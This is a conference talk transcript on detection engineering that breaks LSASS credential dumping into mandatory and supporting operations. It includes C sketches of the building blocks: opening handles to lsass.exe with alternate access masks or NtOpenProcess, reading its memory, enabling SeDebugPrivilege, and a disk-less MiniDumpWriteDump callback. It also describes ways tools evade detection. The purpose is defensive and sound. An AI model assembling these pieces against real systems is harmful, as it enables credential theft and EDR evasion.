Dissecting Tradecraft: Building Robust Detections Through Tradecraft Decomposition
Using the MITRE ATT&CK framework as a foundation, we will explore how adversary procedures can be broken down further into variants, each comprising a series of discrete operations.
About Matt Hand & Prelude
Thanks for coming. I'll skip through the majority of this. I work at Prelude. We work on threat management, just trying to make sure that EDR works the way you would expect it to when you need it to. I'm here today to talk about robust detections, specifically focused on technique-level stuff. How many detection engineers are here, just by a show of hands? A handful, OK.
Well, hopefully we can convince you guys that there may be a simpler way of approaching detection engineering that kind of pushes away a lot of the noise.
So we have to kind of have a bit of a reality check here for a second. Anyone here who's worked in incident response, offensive security like I used to, or really any aspect that deals with confronting incidents directly knows that right now adversaries have more tools at their disposal than ever.
Reality of our situation
2019 was the year of the C2. We went from, you know, a handful to what felt like hundreds, a bunch of different offensive tools up on GitHub, things that I've written live there. This is only getting worse now. The barrier to entry for capability development used to be relatively high. You used to have to be able to write code, test code, understand internals, understand tradecraft.
Now, if you can handle just the code generation aspect, it becomes much easier. We have Copilot, which is trained on GitHub data, and that is where all of our offensive tools live. So the ability for an adversary to begin capability development is more accessible than ever. And then when they have these tools and they get caught, trivial modifications to them are very, very frequent. We see hundreds of different variations of something as trivial as changing a string from "mimi katz" to "mimi dogz." It's as simple as that, and it breaks production detections today. Unfortunately, when you start getting into more nuanced things like instruction manipulation, it gets even worse, and then things start falling apart really, really quickly. And what this leads to is, frankly, what I view as low-skill threat actors, e-crime operators, ransomware-as-a-service people that are just kind of, you know, throwing stuff at a wall until something sticks.
Red team operators, pen testers — they're winning today more frequently than not, and that's not okay, especially when the stakes are as high as they are today. And then imagine what a really advanced adversary can do with actual apex or nation-state capabilities. It's a bit of a different paradigm. So I think our strategies for how we build detections today are fundamentally broken.
And I want to kind of talk to you about why that is and what we can do about it. So here's a map of all of the behaviors exhibited by a garden-variety credential dumper. If you've ever done reverse engineering on an entire piece of malware, don't worry, this isn't the interesting part; this is just a summary of how complex these systems get. This is everything from "I deliver a payload" to "I have your credentials." That's it. Just run a thing, give me your password. That's an insane amount of information. Has anyone even been able to read all of the boxes on the slide yet? That's insane. And it's not useful, which is the bigger problem. So the root of the problem is that when we're looking at malware, when we're looking at tools, I don't think we're asking the right question in the first place. We spend so much time focused on what the code looked like
when it was delivered — what was the file extension, did they nest the files and all that? How was it obfuscated? What packer did they use? All of these different things that resulted in code being executed are in our purview for detection. But does that really matter? Do we care how that shellcode got into memory? Sure, in certain cases — but who here does actual attribution with the ability to impose costs, right?
Like, who here works for the FBI? That's really what this boils down to. If you're not actually doing attribution — cool, collect that data. But is that what you should be focusing your five detection engineers on, the ones holding up your entire security program on their shoulders? Probably not, right? So it's arguably just not applicable for a majority of cases. Why are we focusing on it? Because it's interesting, surely. But is it useful?
We should be asking instead: what behaviors did that malware or tool exhibit? That's not a controversial point. Behavioral detections have been around for my entire career, going on 15 years now. But we've strayed so far that we don't box or scope our definition of behavior well enough — we include everything that comes before and after the execution of the technique. So if we go back to our credential dumper here: if we're focused on detecting credential dumping, that's the only thing that matters. This second-to-last line, that's credential dumping. That's what we're building the detection off of. Let's focus on that. Let's not worry about what shellcode loader and what packer and all that. That's interesting, but not useful. So here is my thesis: very little about a technique actually matters when you're building robust detections.
Practical example
That's the entire premise of this talk: that very little of anything we look at today truly matters when we're trying to build a detection to catch more than one version of a thing. And by identifying what those basic attributes are, we can focus our efforts on those, make meaningful change, and build strong, effective detections that are resilient in a changing environment.
So sticking with the credential dumping theme, we're going to use a practical example of OS credential dumping from LSASS. Who here has used Mimikatz before, or run Mimikatz? Pretty common, right? The whole gist of it is that if I can get a handle to LSASS — the Local Security Authority Subsystem Service, the lsass.exe process — I can read its virtual memory and extract credential material from it. Pretty common. Everybody and their mother has done it.
Every threat actor that I can think of does some version of this — native Windows facilities, custom-written tools, C2 frameworks. There are so many different variations of doing this that it's pretty much the canonical example of "somebody did a bad thing." So we'll use this. Here is some available public tooling to do this. There may be some familiar names there, right? We see Mimikatz, that's the canonical example. There are 28 in this list. There are 28 because I gave myself a 30-minute timer to name as many tools off the top of my head as I could. Again, I'm a red teamer by trade; these are things that I use, so I'm maybe a little more keyed in, but 28 in 30 minutes from just Google searching and memory. That's insane. Are these all actually different ways to dump credentials from LSASS? I don't think so. So why are there so many?
Well, what happens when you are doing malware development or tooling development is that you have to adapt to stress. Anyone who's ever done athletic training — that graph right there should look pretty familiar. That's a stress-recovery-adaptation cycle. You introduce a stressor that hurts you, then you adapt to that stressor and produce something that's better, and you do that iteratively. That's how you get stronger. All things in security tie back to biology, come to find out.
So Mimikatz, in this example, is pretty much the new EICAR test string. If you drop Mimikatz on a box and it doesn't get caught, something is horrifically wrong. So we have to have a different version of Mimikatz. The stress of endpoint protection required an adaptation to our strategy for dumping credentials from LSASS. And often these are only minor changes to the logic of the program that will get around detection strategies today. Again, we're so specific on...
You know, a common Mimikatz detection strategy is to flag on the process rights that are requested in a call to OpenProcess. Pretty garden-variety Mimikatz detection. Well, what if I request something different? It completely falls apart. So we can change little tiny things about Mimikatz, or any other example, to break detections. But that's just the face-value stuff. It goes so much deeper than that.
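To make that concrete, here's a minimal sketch — not any particular tool's code, and with a placeholder PID — of the same "obtain a handle" operation expressed with two different access masks. A detection keyed to one exact rights combination misses the other, even though nothing meaningful about the behavior has changed:

```c
// Sketch only: the same "obtain a handle" operation with two different access masks.
// A detection keyed to one exact mask misses the other. PID 1234 is a placeholder.
#include <windows.h>
#include <stdio.h>

int main(void)
{
    DWORD pid = 1234; // placeholder PID for illustration only

    // Rights combination commonly associated with Mimikatz-style reads
    HANDLE h1 = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);

    // Functionally sufficient alternative that dodges an exact-mask signature
    HANDLE h2 = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, FALSE, pid);

    printf("h1=%p h2=%p\n", (void *)h1, (void *)h2);
    if (h1) CloseHandle(h1);
    if (h2) CloseHandle(h2);
    return 0;
}
```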
We can add or remove functionality to change things right down to the size and code flow of the sample. We can swap function calls — who remembers the whole syscall thing that happened a couple of years ago? That's all it is. It's just changing the entry point in the call stack. It's not actually changing anything; you're still doing the exact same thing, just entering at a different point. Minor changes like this happen because they're very, very low cost. And if they're already low cost at human-intervention levels — not to be the AI boogeyman, but that's what it's really good at. You ask Copilot, "Hey, give me five different ways to call this function," and it says, "Here you go." It's probably wrong, but it works in a case or two, and it lowers the barrier to entry. Apparently the barrier to entry for PowerPoint is too high for me. Let's see. There we go. So these changes don't cost a lot in terms of time and effort, so they're very easy to do. Adversaries have a low cost to implement them, so they can produce a ton of different samples, which is how we end up with those 28. So when we're looking at that crazy graph that I showed, and we're saying this is just too much, we need to take a step back and redefine the behaviors that we would expect out of a credential dumper. But to do that, we actually run into an issue with ATT&CK.
Expanding ATT&CK
Who here has heard of ATT&CK before? It's a common way of referencing any kind of adversary tradecraft. There are many different opinions on its usefulness, but I think we can all generally agree that if I say "OS credential dumping from LSASS" and there's a canonical way of referencing that, it's useful. ATT&CK works on a three-tier system: tactics, techniques, and procedures. Procedures are the lowest-level description of doing something.
So a technique would be OS credential dumping. But when we need to describe tradecraft, we end up going lower, because we don't have a sufficient degree of resolution for what we're actually trying to say. If we're saying OS credential dumping from LSASS, there are many different ways to do that, as we'll talk about in a second. There has to be something lower than that. So we found that there are two layers below. Before Prelude, I worked at SpecterOps on the adversary detection team, and they coined the terminology of operation and function. This has been further publicized by Jared Atkinson, who's really pushing this as an idea, and I'm very, very thankful for that. The operation is that next step lower than a procedure — the high-level step taken, like "I need to get a handle to LSASS."
Open a handle to LSASS with sufficient privileges — it describes a step in a procedure. And the function is the specific way that you do that. A procedure will have one or more operations, and an operation will have one or more functions. So the function is that very specific thing, like "Mimikatz calls OpenProcess with these rights." That level of resolution is one we already naturally work at when we're reverse engineering malware or doing code review for open source tooling. So that's what we do: when we look at these samples, we create these lists of functions. This describes the behavior of any of these tools — it's essentially the call stack. You're doing a code review to produce these. So I have four samples right here that we'll just pick on for no real reason; it's just a workable sample size that lets us show similarity.
So if we look at each of the specific versions of this, it's a lot to take in. SafetyKatz itself has 10 steps, and all SafetyKatz does is run Mimikatz. That's it. There's really not a lot of difference in that, but it's still 10 different things that we have to catalog. How would I build a detection for SafetyKatz? Would I catch it opening a handle to LSASS? Sure, that's a strategy. What about the call to MiniDumpWriteDump to create the dump file that's then parsed by the loaded copy of Mimikatz? Do we write a detection for Mimikatz being loaded? That doesn't sound like a great strategy when we know that after 30 minutes of me sitting down, I could name one tool per minute. That's not a good use of your time. And this permeates down to all the other things. Then all the new tooling comes out.
What happens if somebody drops something on Twitter right now and you have to build a detection for it? What are you going to do? It's this never-ending thing. And this is just one technique of the 700-something that are in MITRE ATT&CK Enterprise v15, or whatever they're on right now. This is a lot. So we need to simplify this even further. Functions are just naturally how we think when we're doing reversing or reviewing code for open source tooling. They are overly specific, though.
Simplification
They're so keyed in on the specific way that a tool or a piece of malware does something that, if we build our detection logic off of them, slight variations can make our detections behavioral but brittle. An example of this is people who build detections off function calls. If you built a detection off of a call to OpenProcess, and an NtOpenProcess call happens instead — those are effectively the exact same thing. There is no fundamental difference, but it will break your detection. It's too specific. We shouldn't be working at that layer. So when we're looking for commonalities between these tools — again, a robust detection catches more than one variation of a tool or a technique — it helps to summarize at the operation level, which is just one layer higher, closer to procedure.
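As a rough illustration of that point, here's a sketch — placeholder PID again, and with the native structures declared locally rather than pulled from winternl.h — of the same operation expressed through two different functions, the Win32 wrapper and the native call underneath it:

```c
// Sketch only: two "functions" expressing the same "obtain a handle" operation.
// A detection written against the OpenProcess call alone misses the NtOpenProcess
// path, even though the behavior is identical. PID 1234 is a placeholder.
#include <windows.h>
#include <stdio.h>

typedef struct _MY_CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } MY_CLIENT_ID;
typedef struct _MY_OBJECT_ATTRIBUTES {
    ULONG Length; HANDLE RootDirectory; PVOID ObjectName;
    ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;
} MY_OBJECT_ATTRIBUTES;

typedef LONG (NTAPI *NtOpenProcess_t)(PHANDLE, ACCESS_MASK, MY_OBJECT_ATTRIBUTES *, MY_CLIENT_ID *);

int main(void)
{
    DWORD pid = 1234; // placeholder

    // Path 1: the Win32 wrapper
    HANDLE h1 = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);

    // Path 2: the native call underneath it, resolved out of ntdll
    NtOpenProcess_t pNtOpenProcess =
        (NtOpenProcess_t)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcess");
    HANDLE h2 = NULL;
    if (pNtOpenProcess) {
        MY_OBJECT_ATTRIBUTES oa = { sizeof(oa) };
        MY_CLIENT_ID cid = { (HANDLE)(ULONG_PTR)pid, NULL };
        pNtOpenProcess(&h2, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &oa, &cid);
    }

    printf("OpenProcess=%p NtOpenProcess=%p\n", (void *)h1, (void *)h2);
    if (h1) CloseHandle(h1);
    if (h2) CloseHandle(h2);
    return 0;
}
```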
So that's what this looks like. We can summarize the same four samples into at most eight distinct operations. So instead of saying, "well, we called OpenProcess with these flags or whatever" to catch this thing — it doesn't really matter. It's "obtain a handle to LSASS." That's all that really matters out of this. We drop some of the specificity for intentional generality, which then allows us to remove noise.
Removing noise
So what happens if we strip away all of the things that are not directly related to or required for credential dumping in this example? Going back: we have "perform system checks" as a common thing, "resolve functions" as a thing. Some of these operations are shared amongst samples, but are they actually required? So we can minimize the set even further and say, well, this is the stuff that is actually required to dump LSASS. The only things that are technically required are a handle to LSASS and a call to read its memory. Those are the only things that are truly required. And depending on the way in which you read memory, there may be one or two small variations, but not a substantial amount.
So in order to do this, we already had this minimized set. We took functions that came from the product of reversing, we summarized those, and then we removed all of the information that just isn't actually required. So there are significant overlaps when we go back to the mandatory operations that are common between samples. Each action in here leads to the next. It's an ordered set.
That creates a unidirectional graph — a graph that flows one way. So if we take those four samples and merge them into one graph that demonstrates control flow, it ends up looking like this. Graphs are super cool; it's just a nice logical way to think about things, and it actually represents the control flow of operations. So in our four samples, the commonalities between them were: adjusting token privileges — the token privilege you need to dump credentials is SeDebugPrivilege. You need to locate the process identifier for lsass.exe, which is a requirement for the OpenProcess call to get a handle. And once you have a handle, you can pass that to a function which will read LSASS's memory. Pretty common flow, but these are the fundamental steps of how almost every credential dumper works. But even then, those can be qualified further. So why weren't all of those present in every tool?
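Before we answer that, here's a minimal sketch of that mandatory flow, assuming SeDebugPrivilege is already held. The read address is a deliberate placeholder; the point is just the sequence of operations a detection would key on, not a working dumper:

```c
// Sketch of the mandatory flow: locate lsass.exe's PID, obtain a handle, issue a read.
// Assumes SeDebugPrivilege is already held. The read address is a placeholder; a real
// dumper would walk the target's modules for credential structures, omitted here.
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdio.h>

static DWORD FindPidByName(const wchar_t *name)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32W pe = { sizeof(pe) };
    DWORD pid = 0;
    if (snap != INVALID_HANDLE_VALUE && Process32FirstW(snap, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, name) == 0) { pid = pe.th32ProcessID; break; }
        } while (Process32NextW(snap, &pe));
    }
    if (snap != INVALID_HANDLE_VALUE) CloseHandle(snap);
    return pid;
}

int main(void)
{
    DWORD pid = FindPidByName(L"lsass.exe");                 // operation: locate the PID
    if (!pid) return 1;

    HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); // operation: obtain a handle
    if (!h) return 1;

    BYTE buf[16] = { 0 };
    SIZE_T bytesRead = 0;
    LPCVOID addr = (LPCVOID)0x10000;                          // placeholder address for illustration
    ReadProcessMemory(h, addr, buf, sizeof(buf), &bytesRead); // operation: read its memory

    printf("pid=%lu bytes read=%zu\n", pid, (size_t)bytesRead);
    CloseHandle(h);
    return 0;
}
```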
Qualifying operations
Well, simply put, they're not actually required. Think of things that can be done outside of the specific sample. Can you derive LSASS's PID elsewhere and pass it as a command-line argument to the tool? Of course — that's how a good majority of them work. Can you ensure that SeDebugPrivilege is already enabled for the token under whose context you're going to run the credential dumper? Of course. You don't actually have to check it; you can just assume it's enabled and, if not, fail. Not a great development strategy, but a realistic one. This creates two different categories: mandatory operations, things that have to happen, and supporting operations, things that can happen to facilitate a mandatory operation. So think of it as: mandatory means you have to see this in the credential dumper; supporting means you likely will see this in the credential dumper. Does that make sense? Nobody's asleep yet. This is good. Okay.
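For reference, a minimal sketch of that supporting operation — enabling SeDebugPrivilege on the current token — might look like this; it only succeeds if the token actually holds the privilege in the first place:

```c
// Sketch of the supporting operation: enabling SeDebugPrivilege on the current token.
// A dumper can do this itself, rely on its parent having done it, or just assume it --
// which is why it is a supporting operation rather than a mandatory one.
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "advapi32.lib")

int main(void)
{
    HANDLE tok = NULL;
    TOKEN_PRIVILEGES tp = { 0 };

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &tok))
        return 1;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tp.Privileges[0].Luid)) {
        CloseHandle(tok);
        return 1;
    }

    // Only takes effect if the token already holds the privilege (i.e., an elevated admin)
    AdjustTokenPrivileges(tok, FALSE, &tp, 0, NULL, NULL);
    BOOL ok = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);

    printf("SeDebugPrivilege enabled: %s\n", ok ? "yes" : "no");
    CloseHandle(tok);
    return 0;
}
```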
Action-oriented detection engineering
So we have 28 tools that we reduced down to just two mandatory actions: obtain a handle to LSASS, and read LSASS's memory. Those are the only two things that matter for the credential dumper. This is intuitive — we know this already — but now we have a language to define it, and we can build detection strategies off of it. So now that we have these actions, or operations, well defined, it becomes a game of: what can your EDR do about that? Obtaining a handle to LSASS is a pretty common one. This is how most EDRs catch OS credential dumping: watch for a handle being opened to a process object, and if the process object matches the name lsass.exe, return the request to me — and sometimes block it, depending on the vendor. That exists in pretty much everything today.
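As a toy illustration of that logic — the HandleOpenEvent record below is invented for this sketch and is not any vendor's real telemetry schema — the handle-open check described above boils down to something like:

```c
// Toy illustration only: a hypothetical handle-open event record and the matching logic
// an EDR applies to it. Real products often also inspect the requested access mask,
// which is exactly where the brittleness described earlier creeps in.
#include <stdio.h>
#include <string.h>

typedef struct {
    const char *target_image; // image name of the process the handle points at
    unsigned int desired_access; // access mask requested by the caller
} HandleOpenEvent;

// Returns 1 when the event should be surfaced as suspected credential dumping
static int flag_lsass_handle_open(const HandleOpenEvent *e)
{
    return _stricmp(e->target_image, "lsass.exe") == 0;
}

int main(void)
{
    HandleOpenEvent benign  = { "notepad.exe", 0x1000 };
    HandleOpenEvent suspect = { "lsass.exe",   0x0410 };
    printf("benign=%d suspect=%d\n",
           flag_lsass_handle_open(&benign), flag_lsass_handle_open(&suspect));
    return 0;
}
```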
Some EDRs have a remote virtual memory read detection. If we have both of those in our EDR, we can say, well, I can catch it here on this mandatory operation, or I can catch it here. But which one would you choose? The trick to all of this is in that graph that I showed: what is the rightmost node? What is the final action taken?
Is opening a handle to LSASS actually indicative of credential dumping? Of course not. It's just opening a handle to LSASS. You could do that in a benign sense — for some reason, Google Update Helper does it. So we have to write an exclusion. Does Google Update Helper read LSASS's memory, though? I really hope not. Not the legitimate version, anyway. It may. That would be terrifying.
So we have to pick one of them: orient to the rightmost node, start there, and then work your way back. What that does is say, this is the most indicative of the thing. If I don't have telemetry for that, go to the second thing. It's still a mandatory operation, so it has to happen, but I can decide there that this is the best version I can detect. Once you start going into supporting operations, the detection starts falling apart, and further down the track it really starts falling apart — like assuming that a file will be written because the tool calls MiniDumpWriteDump. Well, what happens if you use a callback in MiniDumpWriteDump, and now all of a sudden it doesn't work? Focus rightmost, and work your way backwards as needed.
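To show why that file-based assumption is brittle, here's a sketch of the callback variant, based on the documented dbghelp callback contract. To stay benign it dumps the current process rather than LSASS, but the point is the same: the dump bytes are handed to the callback and never touch disk, so a detection waiting for a dump file never fires:

```c
// Sketch: MiniDumpWriteDump routed through an I/O callback. With a NULL file handle,
// dbghelp hands the dump contents to the callback instead of writing a file on disk.
// Dumps the current process, not lsass, to keep the example benign.
#include <windows.h>
#include <dbghelp.h>
#include <stdio.h>
#pragma comment(lib, "dbghelp.lib")

static SIZE_T g_bytes_seen = 0;

static BOOL CALLBACK DumpCallback(PVOID param, const PMINIDUMP_CALLBACK_INPUT in,
                                  PMINIDUMP_CALLBACK_OUTPUT out)
{
    (void)param;
    switch (in->CallbackType) {
    case IoStartCallback:
        out->Status = S_FALSE;               // tell dbghelp the callback will handle I/O
        return TRUE;
    case IoWriteAllCallback:
        g_bytes_seen += in->Io.BufferBytes;  // dump contents arrive here, never touch disk
        out->Status = S_OK;
        return TRUE;
    case IoFinishCallback:
        out->Status = S_OK;
        return TRUE;
    default:
        return TRUE;
    }
}

int main(void)
{
    MINIDUMP_CALLBACK_INFORMATION ci = { DumpCallback, NULL };

    // NULL file handle: all output is routed through the callback above
    BOOL ok = MiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(), NULL,
                                MiniDumpWithFullMemory, NULL, NULL, &ci);

    printf("ok=%d bytes routed through callback=%zu\n", ok, (size_t)g_bytes_seen);
    return 0;
}
```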
Validating with functions
So now that we have a detection strategy — we know the rightmost node among the mandatory operations is our target — we have to validate it. And this is where things get interesting and you really start finding out how weird offensive security tooling actually is, and how similar everything is. If we classify everything into a family, saying credential dumping is comprised of these two or four parts, depending on how we want to count, what are the unique expressions of those two or four things? That's where you start creating these families. And these families are identified by how each sample achieved those operations — what functions, specifically, did it use?
So to open a handle to LSASS, it may be a call to OpenProcess, maybe a call to NtOpenProcess. It may be stealing a handle. It may be leaking a handle from the kernel. Those are four different ways of doing it that I just named. And then for reading virtual memory, it may be ReadProcessMemory, it may be a handle duplication, or it may be some kernel primitive — but it's an arbitrary read.
There are a bunch of different ways — MiniDumpWriteDump, MiniDumpWriteDump with a callback, and so on. These are all unique ways, unique functions, that describe an operation. But when you catalog all of those and go back to our original graph saying, hey, these tools use these functions, you start finding that there's massive overlap. What actually changes is the language that was used, or the evasive — for lack of a better word — crap-stacking that tends to happen: I'll stack this ETW-disable thing, and then I'll use direct syscalls, and then I'll turn off Defender, and then I'll do credential dumping. That didn't matter at all; it's just nonsense that got stacked in there. It's very safe to just ignore. And then if we say, okay, well, I actually just used OpenProcess and MiniDumpWriteDump — well, so did these other 15 tools, and you create these families.
And that becomes your validation set — those are unit tests for your detections. And now you have a strategy for validating these now-robust detections that are built off of the mandatory operations. So, wrapping this up: don't focus on the tool specifically when building technique- or procedure-based detections. If we have a general understanding of what the flow of a technique is — what the mandatory operations are that have to happen — we can then say, I don't care about the tools. I'll build a detection for those operations and then validate with the tools later, as unit tests. You could take all 28 that I named and run them through it, and you wouldn't really see a difference; you'd just catch them, because the operations are all the same. The functions are the only things that are different. And then, when we're analyzing malware or any kind of tooling,
just take a step a little bit below the procedure level. Don't go as deep as you naturally would when doing a code review or reverse engineering and saying, here are the specific functions that were used — that's too granular. You want somewhere between procedure and function, which is naturally the operation. So just summarize the operations in human language, whatever makes sense to you; there's no agreed-upon vocabulary. MITRE is not going to extend ATT&CK to do this. This is all an idea that you keep in your head and just think:
I'm describing a technique and I'm looking at a sample that is comprised of functions. Let me summarize the functions into something that I can use.
Acknowledgements
So just two quick acknowledgements here. Two people have contributed greatly to my viewpoints on this and how I've grown to understand it as time has gone on, especially coming from a red team perspective — I'm used to breaking things and trying not to get caught, and now I'm in the business of trying to catch everything that I broke. Michael Barclay, a brilliant researcher on my team, wrote a really cool tool called Cartographer that actually models all of this behavior. He has Cartographer running as a web app, so go poke around there and see what this looks like in practice.
And then of course, Jared Atkinson. He has a blog series called On Detection that discusses these ideas in an incredible amount of detail — the philosophy behind why we think this way and some of the ways we can think about it slightly differently. Two brilliant researchers I'm very, very thankful to have learned from.
But that's the end of the talk. I'm happy to answer any and all questions here or at our booth. Just as a quick note, we have a booth in the expo hall that I'll be hanging out at all week. So if you want to talk about this long form, or if questions in front of the room aren't really your forte, come meet us there. I'm happy to talk for however long you'd like.
Question and answer
Scheduled tasks is a good one, because that one's actually not that complicated, but it's everywhere. Services, too — in Jared's blog posts, where I use credential dumping for everything, he uses services for his examples. That's another really interesting one where a lot of the research is already done.
The first question: you said MITRE ATT&CK wouldn't necessarily solve this. Since these are, I believe, repeatable things — once you do the work, you can share it with others — do we maybe need a framework that tries to solve this at a deeper level? And the second question: some of this stuff is out of the detection engineer's hands. For example, some of it can only be solved at the EDR level, because it targets specific telemetry that you cannot necessarily get at or understand, because the EDR abstracts it for you. So perhaps it says, "I detect credential dumping," but you don't necessarily have the underlying information. So can we maybe distinguish between the consumer of the telemetry from the EDR and the detection engineer at the EDR level, if that makes sense?
Yeah, those are two really great questions. So the first one — and make sure I don't miss these, my train of thought's going to go all over the place — the first one was around, you know, ATT&CK not really being adaptable to this. I don't necessarily think that it's impossible to adapt; I just think that it's not incentivized to do so. I agree, this is largely a one-time effort.
It does change from operating system version to operating system version — that's kind of what my team does, the research into this area. I agree that it's a knowledge-sharing thing to a certain degree. And a big thing that I'm passionate about is that researchers are really expensive, hard to find, and usually pretty prickly. Not everyone can afford or should have researchers. So if someone's going to do the research, we should share it and make sure that people are able to use it. That way the barrier to entry isn't your research ability; it's your ability to build a good detection in your environment. So I don't think MITRE will accept this, because it's such a massive thing and it doesn't really hold true across their model. They just added financial theft as a technique — what are the procedures of that, let alone the operations? "Open a bank account"? What am I going to do about that? So it doesn't really apply to their model in general.
Maybe it is a different way of talking about it. Michael Barclay's Cartographer project is what we're kind of hedging on as a way to discuss it, and if that's something you're interested in, contributions are very welcome there. But it's like the xkcd comic: this standard sucks, let's build another standard — five years later, this standard sucks. So I don't know if a new framework will solve it.
In terms of detection engineering, decoupling that from the EDR — those are very real problems that we deal with. I'm not going to shill my company too much here, but we see where the EDR failure points are, and they differ greatly between vendors. Take, say, SentinelOne: they use a lot of aggregate events, saying this event plus this event mean this thing. But I can't see event A or event B individually; they just combine them all.
That makes it really tough to say, well, what part did you actually see? That comes down to making a demand of your vendor: hey, I appreciate you doing this thing, but you've abstracted too much — being vocal with your vendors and saying, I actually need visibility into this data. And if they don't have it, make noise. That's really the best that we have today. But yeah, I agree, it's a very sore point that I'm very invested in solving.
Hi, great talk. Completely agree with everything you're saying. I was curious — because when you have a generic detection, like you mentioned quickly, you're also going to have false positives, right? — Yes. — And things change, and you have a big environment, and there's a lot of weird things going on, right? So I'm thinking, can the same type of reasoning be used to create those exclusions? So instead of that specific, you know, Chrome thing, whatever you said, could you do the same, so it doesn't become too specific when it comes to handling that whitelisting? What's your view on handling that?
Exclusions are so dangerous for the natural reason that, as soon as you introduce an exclusion, that's an opportunity for a bypass. You whitelist a file, and now all of a sudden malware can masquerade as it. Those are legitimate problems. But what we found exploring this methodology is that by using these mandatory operations, the further right you go, the fewer false positives there are. So take the Google Update Helper thing, right? That's opening a handle, so you have to write an exclusion for it. But Google Update Helper does not read memory.
So if you can build your detection around reading memory, there are fewer total events, period, for you to have to write exclusions on. So those exclusions become much more tolerable to keep specific. As for applying this methodology to the exclusion side, I think it becomes tricky, because the difference between a false positive and a true positive can sometimes be immeasurable — they may do the exact same thing, and there's no real way to distinguish them. Then there are other attributes you look at, like: was the calling binary signed?
All the traditional things that you would do. But right now exclusions are kind of a weak point — now we have to have complex joins, and it just gets messy. But yeah, I'd be really interested to hear if anybody has thoughts on that specifically, because it is a realistic part of the ecosystem right now. Thank you.